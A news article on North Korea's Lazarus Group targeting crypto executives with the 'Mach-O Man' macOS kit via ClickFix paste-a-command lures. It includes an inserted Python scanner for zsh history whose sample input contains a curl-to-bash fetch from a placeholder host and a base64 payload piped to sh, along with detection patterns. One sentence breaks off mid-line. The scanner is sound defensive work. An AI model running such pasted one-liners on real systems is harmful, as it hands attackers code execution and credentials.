North Korea-backed hackers launch new attack vector targeting cryptocurrency companies and executives

The North Korean state-run Lazarus Group is running a new campaign known as “Mach-O Man” that turns routine business communication into a direct path to credential theft and data loss, security experts warned Wednesday.

The collective, with an estimated cumulative haul of $6.7 billion since 2017, is targeting fintech, cryptocurrency and other high-value executives and companies, Natalie Newson, senior blockchain security researcher at CertiK, told CoinDesk on Wednesday.

In the past two weeks alone, North Korean hackers have siphoned more than $500 million from the Drift and KelpDAO exploits in what appears to be a sustained campaign. The crypto industry needs to start viewing Lazarus the same way banks view nation-state cyber actors: “as an ongoing, well-funded threat, not just another news headline,” he said.

“What makes Lazarus especially dangerous right now is its level of activity,” Newson said. “KelpDAO, Drift, and now a new malware kit for macOS, all in the same month. This is not a random hack; it is a state-run financial operation running at a scale and speed typical of institutions.”

North Korea has turned cryptocurrency theft into a lucrative domestic industry, and Mach-O Man is just the latest product of that process, he said. While Lazarus created it, other cybercrime groups are also using it.

“It is a modular malware kit for macOS created by the infamous Chollima division of the Lazarus Group. It uses native Mach-O binaries designed for Apple environments where crypto and fintech operate,” he said.

Newson said Mach-O Man uses a delivery method known as ClickFix. “It’s important to be clear because a lot of coverage mixes two different things,” he said. ClickFix is a social engineering technique in which the victim is asked to paste a command into their terminal to fix a fabricated connection problem.

It works when Lazarus sends executives an “urgent” meeting invitation via Telegram for a Zoom, Microsoft Teams or Google Meet call, according to Mauro Eldritch, security expert and founder of threat intelligence firm BCA Ltd.

The link leads to a fake but convincing website that tells them to copy and paste a simple command into their Mac’s terminal to “fix a connection issue.” By doing so, victims provide immediate access to corporate systems, SaaS platforms, and financial resources. By the time they discover they were exploited, it is usually too late.

There are several variations of this attack, security threat researcher Vladimir S. said on

“These fake ‘verification steps’ guide victims through keyboard shortcuts that execute a harmful command,” said CertiK’s Newson. “The page looks real, the instructions look normal, and the victim initiates the action themselves, which is why traditional security checks often miss it.”
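Because the victim types or pastes the command themselves, the most reliable trace of a ClickFix-style lure is often the shell history or endpoint command log on the affected Mac. The following is an added example, not code from the article or from any of the researchers quoted in it: a small scanner that parses extended zsh history lines and flags one-liners with the shape such “fix your connection” commands typically take. The indicator patterns (a download tool piped straight into a shell, a base64-decoded payload piped into a shell, removal of the Gatekeeper quarantine attribute) are my assumptions about what to look for, not details the article provides, and the history lines are constructed sample input.

```python
"""Scan macOS zsh history for paste-into-terminal lures (added example; indicator
patterns are assumptions, sample history is constructed)."""
import re
from dataclasses import dataclass

# Extended zsh history format (setopt EXTENDED_HISTORY): ": <epoch>:<duration>;<command>"
ZSH_HISTORY_LINE = re.compile(r"^: (?P<ts>\d+):\d+;(?P<cmd>.*)$")

# Assumed indicators of a pasted "fix" command, each with a human-readable label.
INDICATORS = [
    (re.compile(r"\b(curl|wget)\b[^|;&]*\|\s*(sudo\s+)?(ba|z)?sh\b"),
     "remote script piped to shell"),
    (re.compile(r"\bbase64\b[^|]*(-d|-D|--decode)\b[^|]*\|\s*(ba|z)?sh\b"),
     "decoded payload piped to shell"),
    (re.compile(r"\bxattr\b.*\bcom\.apple\.quarantine\b"),
     "quarantine attribute removal"),
]


@dataclass
class Finding:
    timestamp: int   # epoch seconds from the history line, 0 if the line had none
    command: str
    reason: str


def parse_history(text):
    """Yield (timestamp, command) pairs from zsh history text.

    Lines in the plain (non-extended) format are yielded with timestamp 0 so that
    a history file written without EXTENDED_HISTORY is still scanned."""
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        m = ZSH_HISTORY_LINE.match(line)
        if m:
            yield int(m.group("ts")), m.group("cmd")
        else:
            yield 0, line


def classify(command):
    """Return the label of the first matching indicator, or None if the command looks benign."""
    for pattern, label in INDICATORS:
        if pattern.search(command):
            return label
    return None


def scan_history(text):
    """Return a list of Finding objects, in history order, for every suspicious command."""
    findings = []
    for ts, cmd in parse_history(text):
        reason = classify(cmd)
        if reason:
            findings.append(Finding(ts, cmd, reason))
    return findings


# Constructed sample history: ordinary developer activity with two pasted lures mixed in.
# The URL is a reserved .invalid name and the base64 string decodes to "echo hello".
SAMPLE_HISTORY = """\
: 1715000001:0;git pull --rebase
: 1715000050:0;npm run build
: 1715000120:0;curl -fsSL https://example.invalid/fix-connection.sh | bash
: 1715000300:0;brew update
: 1715000420:0;echo 'ZWNobyBoZWxsbwo=' | base64 -d | sh
: 1715000500:0;xattr -l ./report.pdf
"""

if __name__ == "__main__":
    for f in scan_history(SAMPLE_HISTORY):
        print(f"{f.timestamp}  {f.reason}: {f.command}")
```

Run against a real file with `scan_history(open(os.path.expanduser("~/.zsh_history")).read())`; the same `classify` function can be applied to the command-line field of endpoint process events. The last sample line shows the quarantine pattern deliberately requiring the attribute name, so legitimate `xattr -l` use is not flagged.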

Most victims of this attack will not realize that their security has been breached until the damage has been done, by which point the malware will typically already have removed itself.

“They probably don’t know yet,” he said. “If they do, they probably won’t be able to identify which variant affected them.”
